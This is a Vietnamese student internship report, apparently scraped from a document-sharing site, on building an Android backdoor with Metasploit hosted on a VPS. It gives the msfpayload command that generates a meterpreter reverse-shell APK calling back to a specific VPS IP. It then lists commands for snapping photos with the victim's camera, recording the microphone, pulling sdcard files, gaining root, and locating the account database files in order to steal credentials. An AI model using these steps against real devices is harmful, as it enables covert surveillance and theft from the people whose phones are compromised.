tạo mã độc trên vps để xâm nhập android ( môi trường internet )
TRANSCRIPT
![Page 1: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/1.jpg)
Sinh viên thực tập : Trần Trọng An
I. Thực hiện trên môi trường internet
1.Cài mã độc trên VPS
1.1 Cài đặt Metasploit lên VPS
a. Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn
công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng
Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy
trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
b. Cài đặt
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn
phiên bản Community miễn phí và dùng cho nghiên cứu.
![Page 2: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/2.jpg)
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm
khác.
Chọn folder cài đặt:
![Page 3: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/3.jpg)
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Chọn server và ngày hết hạn, để mặc định:
![Page 4: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/4.jpg)
Quá trình cài đặt của Metasploit:
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
![Page 5: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/5.jpg)
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create
Account:
![Page 6: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/6.jpg)
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
2.Từ VPS điều khiển thiết bị qua internet
Các bước thực hiện
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào
![Page 7: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/7.jpg)
Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh “Msfpayload
android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R >
/root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132
2. Khởi động Metasploit Console trên VPS
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần
trên, ở đây chỉ khác là sử dụng chính IP của VPS
![Page 8: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/8.jpg)
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị
hack
![Page 9: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/9.jpg)
Để xem thông tin về máy, nhập lệnh SysInfo
![Page 10: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/10.jpg)
• Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước.
• Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
![Page 11: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/11.jpg)
• Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Dùng lệnh cd /sdcard/Download để vào thư mục
Để tải về máy, ta nhập lệnh
Download madoc.apk
![Page 12: Tạo mã độc trên vps để xâm nhập android ( môi trường internet )](https://reader035.vdocuments.mx/reader035/viewer/2022062419/55873426d8b42add648b4675/html5/thumbnails/12.jpg)
Một số lệnh khác :
để upload gõ lệnh upload
Và file này sẽ được tải về thư mục root của máy Kali
Gõ shell để vào lệnh
kiểm tra xem có root chưa gõ
su
whoami
Nếu báo unknown id is 0 tức là đã root
ls -l danh mục file và các quyền
cd để chuyển hướng thư mục
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
để xem danh sách và down load các file hay thay đổi các file trong ROM
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
^C để quay lại
Sử dụng SQLite để mở file db